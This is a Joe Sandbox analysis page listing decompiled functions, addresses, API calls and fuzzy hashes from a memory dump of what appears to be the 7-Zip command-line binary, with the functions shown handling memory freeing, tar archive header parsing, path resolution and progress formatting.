Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: ErrorLastValue$AllocCurrentHeapThread
String ID:
API String ID: 2020098873-0
Opcode ID: 55fbcf2c7f2f4967b79abaeaadafaeb02b42f847358bd6d886319d930bf8ac5d
Instruction ID: 886707f6ee56ed2fdb0e8759095dced5a20534092e2ad5f091fc19cf1158f84c
Opcode Fuzzy Hash: 55fbcf2c7f2f4967b79abaeaadafaeb02b42f847358bd6d886319d930bf8ac5d
Instruction Fuzzy Hash: BAF062359003219BD7312B32BC0975E3B94EB427A1B10093AF959D67A0EBA888D1869A

Uniqueness

Uniqueness Score: -1.00%

Function 0046F74E Relevance: 7.5, APIs: 2, Strings: 3, Instructions: 27
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0046F74E(void* _a4) {
				int _t7;
				void* _t13;
				void* _t14;

				_t13 = _a4;
				_t7 = VirtualFree( *(_t13 + 0x10), 0, 0x8000);
				_t14 =  *0x490158 - _t13; // 0x48e138
				if(_t14 == 0) {
					_t7 =  *(_t13 + 4);
					 *0x490158 = _t7;
				}
				if(_t13 == 0x48e138) {
					 *0x48e148 =  *0x48e148 | 0xffffffff;
					return _t7;
				} else {
					 *( *(_t13 + 4)) =  *_t13;
					 *( *_t13 + 4) =  *(_t13 + 4);
					return HeapFree( *0x496580, 0, _t13);
				}
			}

0x0046f74f
0x0046f75d
0x0046f763
0x0046f769
0x0046f76b
0x0046f76e
0x0046f76e
0x0046f779
0x0046f79b
0x0046f7a3
0x0046f77b
0x0046f783
0x0046f78a
0x0046f79a
0x0046f79a

APIs

VirtualFree.KERNEL32(000000FF,00000000,00008000,8H,0046F84E,8H,00000000,00000000,00000000,00000000,?,0046F900,00000010,0046C1AA,00000000,?), ref: 0046F75D
HeapFree.KERNEL32(00000000,?,?,0046F900,00000010,0046C1AA,00000000,?), ref: 0046F793

Strings

8H, xrefs: 0046F74E
8H, xrefs: 0046F763, 0046F76E
8H, xrefs: 0046F773

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: Free$HeapVirtual
String ID: 8H$8H$8H
API String ID: 3783212868-3582048164
Opcode ID: ce349bc7234a9fb2b6cb910d916a073b28eb422957feac5cc9b9a7a5f21bd2ef
Instruction ID: a54e31c1f238622790ec37ba6009a3f98b6d7d893c2fccd0110358c51c35deab
Opcode Fuzzy Hash: ce349bc7234a9fb2b6cb910d916a073b28eb422957feac5cc9b9a7a5f21bd2ef
Instruction Fuzzy Hash: 1DF034355006109FD3609F08FC89A467BA1FB48720F11483AF09A9B7A0C771AC80CF88

Uniqueness

Uniqueness Score: -1.00%

Function 00438A2E Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 286
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00438A2E(intOrPtr __ecx, signed char* __edx, void* __eflags) {
				void* __esi;
				signed int _t109;
				signed int _t114;
				signed int _t115;
				signed int _t116;
				signed int* _t124;
				signed int _t125;
				signed int _t127;
				signed int _t129;
				signed int _t140;
				signed int _t143;
				signed int _t146;
				signed int _t150;
				signed int* _t153;
				signed int _t154;
				void* _t156;
				void* _t157;
				signed int* _t176;
				void* _t181;
				void* _t204;
				void* _t219;
				void* _t223;
				void* _t226;
				void* _t227;
				void* _t228;
				intOrPtr _t233;
				signed char** _t240;
				signed int* _t242;
				signed int* _t243;
				void* _t244;
				intOrPtr _t251;
				void* _t253;

				E0046B890(E00478310, _t253);
				_t240 =  *(_t253 + 0xc);
				 *(_t253 + 0xf) =  *(_t253 + 0xf) & 0x00000000;
				 *((intOrPtr*)(_t253 - 0x20)) = __edx;
				_t240[1] = _t240[1] & 0x00000000;
				 *((intOrPtr*)(_t253 - 0x28)) = __ecx;
				 *( *_t240) =  *( *_t240) & 0x00000000;
				 *__edx =  *__edx & 0x00000000;
				 *((intOrPtr*)(_t253 - 0x10)) = 0x200;
				_t109 = E0040FA74(__ecx, _t253 - 0x24c, _t253 - 0x10);
				if(_t109 != 0) {
					L41:
					 *[fs:0x0] =  *((intOrPtr*)(_t253 - 0xc));
					return _t109;
				}
				_t251 =  *((intOrPtr*)(_t253 + 8));
				while( *((intOrPtr*)(_t253 - 0x10)) != 0) {
					if( *((intOrPtr*)(_t253 - 0x10)) != 0x200) {
						_push("There is no correct record at the end of archive");
						L12:
						E00409664(_t240);
						L13:
						_t109 = 0;
						goto L41;
					}
					 *((intOrPtr*)(_t251 + 0x68)) =  *((intOrPtr*)(_t251 + 0x68)) + 0x200;
					if(E00438E5B(_t253 - 0x24c) == 0) {
						__eflags =  *(_t253 + 0xf);
						if( *(_t253 + 0xf) == 0) {
							_push(_t251);
							_t219 = 0x64;
							E00438E71(_t253 - 0x24c, _t219);
							_push(_t251 + 0x18);
							_t181 = 8;
							_t114 = E00438E29(_t253 - 0x1e8);
							__eflags = _t114;
							if(_t114 == 0) {
								L26:
								_t109 = 1;
								goto L41;
							}
							_t242 = _t251 + 0x1c;
							_t115 = E00438E29(_t253 - 0x1e0, _t242);
							__eflags = _t115;
							if(_t115 == 0) {
								 *_t242 =  *_t242 & 0x00000000;
								__eflags =  *_t242;
							}
							_t243 = _t251 + 0x20;
							_t116 = E00438E29(_t253 - 0x1d8, _t243);
							__eflags = _t116;
							if(_t116 == 0) {
								 *_t243 =  *_t243 & 0x00000000;
								__eflags =  *_t243;
							}
							__eflags = (((( *(_t253 - 0x1d0) & 0x000000ff) << 0x00000008 |  *(_t253 - 0x1cf) & 0x000000ff) << 0x00000008 |  *(_t253 - 0x1ce) & 0x000000ff) << 0x00000008 |  *(_t253 - 0x1cd) & 0x000000ff) - 0x80000000;
							_t124 = _t251 + 0x10;
							 *(_t253 + 0xc) = _t124;
							if((((( *(_t253 - 0x1d0) & 0x000000ff) << 0x00000008 |  *(_t253 - 0x1cf) & 0x000000ff) << 0x00000008 |  *(_t253 - 0x1ce) & 0x000000ff) << 0x00000008 |  *(_t253 - 0x1cd) & 0x000000ff) != 0x80000000) {
								_push(_t124);
								_t223 = 0xc;
								_t125 = E00438DD3(_t253 - 0x1d0, _t223, _t251);
								__eflags = _t125;
								if(_t125 == 0) {
									goto L26;
								}
								goto L22;
							} else {
								_t176 =  *(_t253 + 0xc);
								 *_t176 = ((( *(_t253 - 0x1c8) & 0x000000ff) << 0x00000008 |  *(_t253 - 0x1c7) & 0x000000ff) << 0x00000008 |  *(_t253 - 0x1c6) & 0x000000ff) << 0x00000008 |  *(_t253 - 0x1c5) & 0x000000ff;
								_t176[1] = ((( *(_t253 - 0x1cc) & 0x000000ff) << 0x00000008 |  *(_t253 - 0x1cb) & 0x000000ff) << 0x00000008 |  *(_t253 - 0x1ca) & 0x000000ff) << 0x00000008 |  *(_t253 - 0x1c9) & 0x000000ff;
								L22:
								_push(_t251 + 0x24);
								_t127 = E00438E29(_t253 - 0x1c4, 0xc);
								__eflags = _t127;
								if(_t127 == 0) {
									goto L26;
								}
								_t129 = E00438E29(_t253 - 0x1b8, _t253 - 0x24);
								__eflags = _t129;
								if(_t129 == 0) {
									goto L26;
								}
								E0046C5C0(_t253 - 0x1b8,  *0x48d374, _t181);
								 *((char*)(_t251 + 0x5c)) =  *((intOrPtr*)(_t253 - 0x1b0));
								_push(_t251 + 0x30);
								_t226 = 0x64;
								E00438E71(_t253 - 0x1af, _t226);
								_t244 = _t251 + 0x54;
								E0046C5C0(_t244, _t253 - 0x14b, _t181);
								_push(_t251 + 0x3c);
								_t227 = 0x20;
								E00438E71(_t253 - 0x143, _t227);
								_push(_t251 + 0x48);
								_t228 = 0x20;
								_t140 = E00438E71(_t253 - 0x123, _t228);
								__eflags =  *((char*)(_t253 - 0x103));
								 *((char*)(_t251 + 0x5d)) = _t140 & 0xffffff00 |  *((char*)(_t253 - 0x103)) != 0x00000000;
								_t143 = E00438E29(_t253 - 0x103, _t251 + 0x28);
								__eflags = _t143;
								if(_t143 == 0) {
									goto L26;
								}
								__eflags =  *((char*)(_t253 - 0xfb));
								 *((char*)(_t251 + 0x5e)) = _t143 & 0xffffff00 |  *((char*)(_t253 - 0xfb)) != 0x00000000;
								_t146 = E00438E29(_t253 - 0xfb, _t251 + 0x2c);
								__eflags = _t146;
								if(_t146 != 0) {
									 *((intOrPtr*)(_t253 - 0x1c)) = 0;
									 *(_t253 - 0x18) = 0;
									 *((intOrPtr*)(_t253 - 0x14)) = 0;
									E00401EEE(_t253 - 0x1c, 3);
									 *((intOrPtr*)(_t253 - 4)) = 0;
									E00438E71(_t253 - 0xf3, 0x9b, _t253 - 0x1c);
									__eflags =  *(_t253 - 0x18);
									if( *(_t253 - 0x18) == 0) {
										L33:
										__eflags =  *((char*)(_t251 + 0x5c)) - 0x31;
										if( *((char*)(_t251 + 0x5c)) == 0x31) {
											_t153 =  *(_t253 + 0xc);
											 *_t153 = 0;
											_t153[1] = 0;
										}
										_t204 = 0;
										_t150 = 0;
										__eflags = 0;
										do {
											_t204 = _t204 + ( *(_t253 + _t150 - 0x24c) & 0x000000ff);
											_t150 = _t150 + 1;
											__eflags = _t150 - 0x200;
										} while (_t150 < 0x200);
										__eflags = _t204 -  *((intOrPtr*)(_t253 - 0x24));
										if(_t204 ==  *((intOrPtr*)(_t253 - 0x24))) {
											__eflags = 0;
											 *((char*)( *((intOrPtr*)(_t253 - 0x20)))) = 1;
										} else {
											_push(1);
											_pop(0);
										}
										E00407A18( *((intOrPtr*)(_t253 - 0x1c)));
										_t109 = 0;
										goto L41;
									}
									_t154 = 0;
									__eflags = 0;
									while(1) {
										_t233 =  *0x48d380; // 0x48d394
										__eflags =  *((intOrPtr*)(_t244 + _t154)) -  *((intOrPtr*)(_t233 + _t154));
										if( *((intOrPtr*)(_t244 + _t154)) !=  *((intOrPtr*)(_t233 + _t154))) {
											goto L33;
										}
										_t154 = _t154 + 1;
										__eflags = _t154 - 5;
										if(_t154 < 5) {
											continue;
										}
										__eflags =  *((char*)(_t251 + 0x5c)) - 0x4c;
										if(__eflags != 0) {
											_push(E00438EA7(_t253 - 0x40, __eflags, 0x2f));
											 *((char*)(_t253 - 4)) = 1;
											_t156 = E0040AFFE(_t253 - 0x4c, _t253 - 0x1c);
											_push(_t251);
											 *((char*)(_t253 - 4)) = 2;
											_t157 = E0040AFFE(_t253 - 0x34, _t156);
											 *((char*)(_t253 - 4)) = 3;
											E00407E17(_t251, _t157);
											E00407A18( *((intOrPtr*)(_t253 - 0x34)));
											E00407A18( *((intOrPtr*)(_t253 - 0x4c)));
											E00407A18( *((intOrPtr*)(_t253 - 0x40)));
										}
										goto L33;
									}
									goto L33;
								}
								goto L26;
							}
						}
						_push("There are data after end of archive");
						goto L12;
					}
					 *(_t253 + 0xf) = 1;
					 *((intOrPtr*)(_t253 - 0x10)) = 0x200;
					_t109 = E0040FA74( *((intOrPtr*)(_t253 - 0x28)), _t253 - 0x24c, _t253 - 0x10);
					if(_t109 == 0) {
						continue;
					}
					goto L41;
				}
				__eflags =  *(_t253 + 0xf);
				if( *(_t253 + 0xf) != 0) {
					goto L13;
				}
				_push("There are no trailing zero-filled records");
				goto L12;
			}

0x00438a33
0x00438a41
0x00438a44
0x00438a48
0x00438a4d
0x00438a56
0x00438a59
0x00438a5c
0x00438a69
0x00438a6c
0x00438a73
0x00438dc2
0x00438dc8
0x00438dd0
0x00438dd0
0x00438a79
0x00438a7c
0x00438a85
0x00438ac8
0x00438ada
0x00438adc
0x00438ae1
0x00438ae1
0x00000000
0x00438ae1
0x00438a87
0x00438a97
0x00438acf
0x00438ad3
0x00438ae8
0x00438aeb
0x00438af2
0x00438b00
0x00438b03
0x00438b06
0x00438b0b
0x00438b0d
0x00438cdc
0x00438cde
0x00000000
0x00438cde
0x00438b13
0x00438b1f
0x00438b24
0x00438b26
0x00438b28
0x00438b28
0x00438b28
0x00438b2b
0x00438b37
0x00438b3c
0x00438b3e
0x00438b40
0x00438b40
0x00438b40
0x00438b6e
0x00438b73
0x00438b76
0x00438b79
0x00438be5
0x00438be8
0x00438bef
0x00438bf4
0x00438bf6
0x00000000
0x00000000
0x00000000
0x00438b7b
0x00438bd9
0x00438bde
0x00438be0
0x00438bfc
0x00438c05
0x00438c09
0x00438c0e
0x00438c10
0x00000000
0x00000000
0x00438c22
0x00438c27
0x00438c29
0x00000000
0x00000000
0x00438c3d
0x00438c4b
0x00438c51
0x00438c54
0x00438c5b
0x00438c66
0x00438c6c
0x00438c7d
0x00438c80
0x00438c81
0x00438c8f
0x00438c92
0x00438c93
0x00438c98
0x00438caa
0x00438cb1
0x00438cb6
0x00438cb8
0x00000000
0x00000000
0x00438cba
0x00438ccc
0x00438cd3
0x00438cd8
0x00438cda
0x00438ceb
0x00438cee
0x00438cf1
0x00438cf4
0x00438d08
0x00438d0b
0x00438d10
0x00438d13
0x00438d81
0x00438d81
0x00438d85
0x00438d87
0x00438d8a
0x00438d8c
0x00438d8c
0x00438d8f
0x00438d91
0x00438d91
0x00438d93
0x00438d9b
0x00438d9d
0x00438d9e
0x00438d9e
0x00438da5
0x00438da8
0x00438db2
0x00438db4
0x00438daa
0x00438daa
0x00438dac
0x00438dac
0x00438dba
0x00438dc0
0x00000000
0x00438dc0
0x00438d15
0x00438d15
0x00438d17
0x00438d17
0x00438d20
0x00438d23
0x00000000
0x00000000
0x00438d25
0x00438d26
0x00438d29
0x00000000
0x00000000
0x00438d2b
0x00438d2f
0x00438d3b
0x00438d42
0x00438d46
0x00438d4b
0x00438d51
0x00438d55
0x00438d5d
0x00438d61
0x00438d69
0x00438d71
0x00438d79
0x00438d7e
0x00000000
0x00438d2f
0x00000000
0x00438d17
0x00000000
0x00438cda
0x00438b79
0x00438ad5
0x00000000
0x00438ad5
0x00438aa6
0x00438aaa
0x00438aad
0x00438ab4
0x00000000
0x00000000
0x00000000
0x00438ab6
0x00438abb
0x00438abf
0x00000000
0x00000000
0x00438ac1
0x00000000

APIs

__EH_prolog.LIBCMT ref: 00438A33

Strings

There is no correct record at the end of archive, xrefs: 00438AC8
There are data after end of archive, xrefs: 00438AD5
There are no trailing zero-filled records, xrefs: 00438AC1

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: H_prolog
String ID: There are data after end of archive$There are no trailing zero-filled records$There is no correct record at the end of archive
API String ID: 3519838083-3898197850
Opcode ID: 3ddcd38165be4bcf837a9b22d6199cdc7b4c165d71977855116068728752eb8a
Instruction ID: 8a8560e65d813f7a5cec42f637569da3f69274a6d4fc9a9a4ce8affac6b4ac77
Opcode Fuzzy Hash: 3ddcd38165be4bcf837a9b22d6199cdc7b4c165d71977855116068728752eb8a
Instruction Fuzzy Hash: 92B10070D003599EDB21EB24C891BEEFBB4AF58304F0454AFF445A3282DB78AA49CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040A28C Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E0040A28C(WCHAR* __ecx, WCHAR** __edx) {
				intOrPtr* _t69;
				signed char _t71;
				void* _t74;
				void* _t78;
				void* _t83;
				signed char _t89;
				WCHAR* _t92;
				WCHAR* _t94;
				long _t95;
				WCHAR* _t96;
				signed int _t97;
				WCHAR* _t100;
				long _t103;
				WCHAR* _t105;
				long _t106;
				WCHAR* _t115;
				signed int _t133;
				signed int _t136;
				WCHAR* _t138;
				signed int _t148;
				WCHAR* _t149;
				signed int* _t153;
				WCHAR** _t156;
				void* _t158;

				E0046B890(E00473B7C, _t158);
				_t156 = __edx;
				 *(_t158 - 0x10) = __ecx;
				 *((intOrPtr*)(__edx + 4)) = 0;
				 *((short*)( *((intOrPtr*)(__edx)))) = 0;
				if( *0x490a7c == 0) {
					 *((intOrPtr*)(_t158 - 0x28)) = 0;
					 *((intOrPtr*)(_t158 - 0x24)) = 0;
					 *((intOrPtr*)(_t158 - 0x20)) = 0;
					E00401EEE(_t158 - 0x28, 3);
					 *(_t158 - 4) = 0;
					_t69 = E00409AD5(_t158 - 0x4c,  *(_t158 - 0x10));
					_t153 =  *(_t158 + 8);
					 *(_t158 - 4) = 1;
					_t71 = E0040A20F( *_t69, _t158 - 0x28, _t153);
					asm("sbb bl, bl");
					 *(_t158 - 4) =  *(_t158 - 4) & 0x00000000;
					E00407A18( *((intOrPtr*)(_t158 - 0x4c)));
					__eflags =  ~_t71 + 1;
					if( ~_t71 + 1 == 0) {
						_t74 = E0040AF39(_t158 - 0x28, _t158 - 0x4c,  *_t153);
						 *(_t158 - 4) = 2;
						E004098A8(_t74);
						 *(_t158 - 4) = 4;
						E00407A18( *((intOrPtr*)(_t158 - 0x4c)));
						_t78 = E0040AF18(_t158 - 0x28, _t158 - 0x58,  *_t153);
						 *(_t158 - 4) = 5;
						E004098A8(_t78);
						 *(_t158 - 4) = 7;
						E00407A18( *((intOrPtr*)(_t158 - 0x58)));
						 *_t153 =  *(_t158 - 0x30);
						_push(_t158 - 0x40);
						_t83 = E0040B0A0(_t158 - 0x4c, _t158 - 0x34);
						 *(_t158 - 4) = 8;
						E00401E26(_t156, _t83);
						E00407A18( *((intOrPtr*)(_t158 - 0x4c)));
						E00407A18( *((intOrPtr*)(_t158 - 0x40)));
						E00407A18( *((intOrPtr*)(_t158 - 0x34)));
						E00407A18( *((intOrPtr*)(_t158 - 0x28)));
						goto L26;
					} else {
						E00407A18( *((intOrPtr*)(_t158 - 0x28)));
						goto L24;
					}
				} else {
					 *(_t158 - 0x18) = 0;
					if( *((intOrPtr*)(__edx + 8)) <= 0x104) {
						E00401E9A(__edx, 0x104);
					}
					_t92 =  *_t156;
					 *(_t158 - 0x1c) = _t92;
					 *(_t158 - 0x14) = GetFullPathNameW( *(_t158 - 0x10), 0x105, _t92, _t158 - 0x18);
					_t94 =  *_t156;
					_t133 = 0;
					if( *_t94 != 0) {
						_t149 = _t94;
						do {
							_t133 = _t133 + 1;
							_t149 =  &(_t149[1]);
						} while ( *_t149 != 0);
					}
					_t94[_t133] = 0;
					_t95 =  *(_t158 - 0x14);
					_t156[1] = _t133;
					if(_t95 == 0) {
						L24:
						_t89 = 0;
					} else {
						if(_t95 < 0x104) {
							L15:
							_t96 =  *(_t158 - 0x18);
							if(_t96 != 0) {
								_t97 = _t96 -  *(_t158 - 0x1c);
								__eflags = _t97;
								 *( *(_t158 + 8)) = _t97 >> 1;
							} else {
								_t100 =  *(_t158 - 0x10);
								_t136 = 0;
								while( *_t100 != 0) {
									_t136 = _t136 + 1;
									_t100 =  &(_t100[1]);
								}
								 *( *(_t158 + 8)) = _t136;
							}
							E0040A4A1( *(_t158 - 0x10), _t156, __eflags);
							L26:
							_t89 = 1;
						} else {
							_t103 = _t95 + 1;
							 *(_t158 - 0x14) = _t103;
							_t104 = _t103 + 1;
							if(_t103 + 1 >= _t156[2]) {
								E00401E9A(_t156, _t104);
							}
							_t105 =  *_t156;
							 *(_t158 - 0x1c) = _t105;
							_t106 = GetFullPathNameW( *(_t158 - 0x10),  *(_t158 - 0x14), _t105, _t158 - 0x18);
							_t138 =  *_t156;
							_t148 = 0;
							if( *_t138 != 0) {
								_t115 = _t138;
								do {
									_t148 = _t148 + 1;
									_t115 =  &(_t115[1]);
								} while ( *_t115 != 0);
							}
							_t138[_t148] = 0;
							_t156[1] = _t148;
							if(_t106 == 0 || _t106 >  *(_t158 - 0x14)) {
								goto L24;
							} else {
								goto L15;
							}
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t158 - 0xc));
				return _t89;
			}

0x0040a291
0x0040a29b
0x0040a2a0
0x0040a2a5
0x0040a2a8
0x0040a2b2
0x0040a3a0
0x0040a3a3
0x0040a3a6
0x0040a3a9
0x0040a3b4
0x0040a3b7
0x0040a3be
0x0040a3c7
0x0040a3cb
0x0040a3d7
0x0040a3d9
0x0040a3df
0x0040a3e4
0x0040a3e7
0x0040a402
0x0040a40c
0x0040a410
0x0040a418
0x0040a41c
0x0040a42b
0x0040a435
0x0040a439
0x0040a441
0x0040a445
0x0040a44e
0x0040a453
0x0040a45a
0x0040a462
0x0040a466
0x0040a46e
0x0040a476
0x0040a47e
0x0040a486
0x00000000
0x0040a3e9
0x0040a3ec
0x00000000
0x0040a3f1
0x0040a2b8
0x0040a2bd
0x0040a2c3
0x0040a2c8
0x0040a2c8
0x0040a2cd
0x0040a2d8
0x0040a2e7
0x0040a2ea
0x0040a2ec
0x0040a2f1
0x0040a2f3
0x0040a2f5
0x0040a2f5
0x0040a2f7
0x0040a2f8
0x0040a2f5
0x0040a2fd
0x0040a301
0x0040a306
0x0040a309
0x0040a3f2
0x0040a3f2
0x0040a30f
0x0040a314
0x0040a365
0x0040a365
0x0040a36a
0x0040a382
0x0040a382
0x0040a38a
0x0040a36c
0x0040a36c
0x0040a36f
0x0040a371
0x0040a376
0x0040a378
0x0040a378
0x0040a37e
0x0040a37e
0x0040a391
0x0040a48e
0x0040a48e
0x0040a316
0x0040a316
0x0040a317
0x0040a31a
0x0040a31e
0x0040a323
0x0040a323
0x0040a328
0x0040a332
0x0040a338
0x0040a33a
0x0040a33c
0x0040a341
0x0040a343
0x0040a345
0x0040a345
0x0040a347
0x0040a348
0x0040a345
0x0040a34d
0x0040a353
0x0040a356
0x00000000
0x00000000
0x00000000
0x00000000
0x0040a356
0x0040a314
0x0040a309
0x0040a496
0x0040a49e

APIs

__EH_prolog.LIBCMT ref: 0040A291
GetFullPathNameW.KERNEL32(?,00000105,00000104,00000002,00000000,59@,00000000), ref: 0040A2E5
GetFullPathNameW.KERNEL32(?,?,00000001,00000002), ref: 0040A338

Part of subcall function 004098A8: AreFileApisANSI.KERNEL32(?,?,?,0040AA48,00000003,?,?,?,?,?,?,?), ref: 004098B4

Part of subcall function 0040B0A0: __EH_prolog.LIBCMT ref: 0040B0A5

Strings

59@, xrefs: 0040A29A

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: FullH_prologNamePath$ApisFile
String ID: 59@
API String ID: 1887739612-2780377667
Opcode ID: e984556f7341f834eb6f76e66d3e67b41fabcb05650be67429daeab63fa82d0f
Instruction ID: 0a5654e161e1f716a3f046905b73ad11417bb6cb1d0641c1b6b0c0ecaf941a14
Opcode Fuzzy Hash: e984556f7341f834eb6f76e66d3e67b41fabcb05650be67429daeab63fa82d0f
Instruction Fuzzy Hash: 53619A71E40209DFCB01EFA5C8419EEBBB5EF59304F10843EE452B7291DB785A518BAA

Uniqueness

Uniqueness Score: -1.00%

Function 004060D4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004060D4(void* __ecx) {
				unsigned int _v8;
				void* _v12;
				char _v43;
				char _v44;
				char _v160;
				void* _t50;
				void* _t53;
				unsigned int _t54;
				intOrPtr* _t55;
				intOrPtr _t60;
				int _t62;
				int _t69;
				void* _t72;
				signed int _t73;
				signed int _t79;
				unsigned int _t80;
				void _t81;
				char _t85;
				unsigned int _t86;
				signed int _t87;
				signed int _t92;
				signed int _t97;
				signed int _t98;
				void* _t103;
				void* _t104;
				unsigned int _t105;
				signed int _t106;
				void* _t107;
				void* _t108;
				signed int _t109;
				void* _t111;
				void* _t112;
				void* _t115;
				void* _t118;
				void* _t121;
				void* _t122;
				void* _t123;

				_t121 = __ecx;
				_t110 =  *(__ecx + 0x18);
				_t71 =  *(__ecx + 0x1c);
				if(( *(__ecx + 0x18) |  *(__ecx + 0x1c)) != 0) {
					_t50 = E0046B300(E0046B370( *((intOrPtr*)(__ecx + 0x10)),  *((intOrPtr*)(__ecx + 0x14)), 0x64, 0), _t103, _t110, _t71);
					_t111 = _t103;
				} else {
					_t50 = 0;
					_t111 = 0;
				}
				_t104 = 0xa;
				E004075FF( &_v44, _t104, _t50, _t111);
				_t53 = E0046B400( &_v44);
				 *((char*)(_t122 + _t53 - 0x28)) = 0x25;
				 *(_t122 + _t53 - 0x27) =  *(_t122 + _t53 - 0x27) & 0x00000000;
				_t54 = _t53 + 1;
				_v8 = _t54;
				_t105 = 4;
				if(_t54 > _t105) {
					_t105 = _t54;
				}
				_t79 =  *(_t121 + 0x20);
				_t106 = _t105 + 2;
				if(_t106 < _t79) {
					_t106 = _t79;
				}
				_t72 =  &_v160;
				_v12 = _t72;
				if( *(_t121 + 0x20) == 0) {
					if(_t106 > 0) {
						_t97 = _t106;
						_t118 =  &_v160;
						_t98 = _t97 >> 2;
						_t69 = memset(_t118, 0x20202020, _t98 << 2);
						_t72 = _t122 + _t106 - 0x9c;
						_v12 = _t72;
						memset(_t118 + _t98, _t69, (_t97 & 0x00000003) << 0);
						_t123 = _t123 + 0x18;
						_t54 = _v8;
					}
					 *(_t121 + 0x20) = _t106;
				}
				_t80 =  *(_t121 + 0x20);
				if(_t80 > 0) {
					_t115 = _t72;
					_t73 = _t80;
					_t92 = _t80 >> 2;
					memset(_t115 + _t92, memset(_t115, 0x8080808, _t92 << 2), (_t73 & 0x00000003) << 0);
					_t123 = _t123 + 0x18;
					_t72 = _v12 + _t73;
					_t54 = _v8;
				}
				 *(_t121 + 0x20) = _t106;
				if(_t54 < _t106) {
					_t109 = _t106 - _t54;
					_t86 = _t109;
					_t112 = _t72;
					_v8 = _t86;
					_t87 = _t86 >> 2;
					_t62 = memset(_t112, 0x20202020, _t87 << 2);
					_t72 = _t72 + _t109;
					memset(_t112 + _t87, _t62, (_t109 & 0x00000003) << 0);
				}
				_t81 = _v44;
				_t107 = _t72 + 1;
				 *_t72 = _t81;
				_t55 =  &_v43;
				if(_t81 != 0) {
					_t108 = _t107 -  &_v43;
					do {
						_t85 =  *_t55;
						 *((char*)(_t108 + _t55)) = _t85;
						_t55 = _t55 + 1;
					} while (_t85 != 0);
				}
				E00407CD5( *((intOrPtr*)(_t121 + 0x24)),  &_v160);
				E00407CAC( *((intOrPtr*)(_t121 + 0x24)));
				 *((intOrPtr*)(_t121 + 8)) =  *((intOrPtr*)(_t121 + 0x10));
				_t60 =  *((intOrPtr*)(_t121 + 0x14));
				 *((intOrPtr*)(_t121 + 0xc)) = _t60;
				return _t60;
			}

0x004060df
0x004060e2
0x004060e5
0x004060ec
0x00406107
0x0040610c
0x004060ee
0x004060ee
0x004060f0
0x004060f0
0x00406113
0x00406116
0x0040611f
0x00406125
0x0040612a
0x0040612f
0x00406132
0x00406135
0x00406138
0x0040613a
0x0040613a
0x0040613c
0x0040613f
0x00406144
0x00406146
0x00406146
0x0040614c
0x00406152
0x00406155
0x00406159
0x0040615b
0x00406164
0x0040616a
0x0040616d
0x00406171
0x0040617b
0x0040617e
0x0040617e
0x00406180
0x00406180
0x00406183
0x00406183
0x00406186
0x0040618b
0x0040618d
0x0040618f
0x00406196
0x004061a0
0x004061a0
0x004061a7
0x004061a9
0x004061a9
0x004061ae
0x004061b1
0x004061b3
0x004061ba
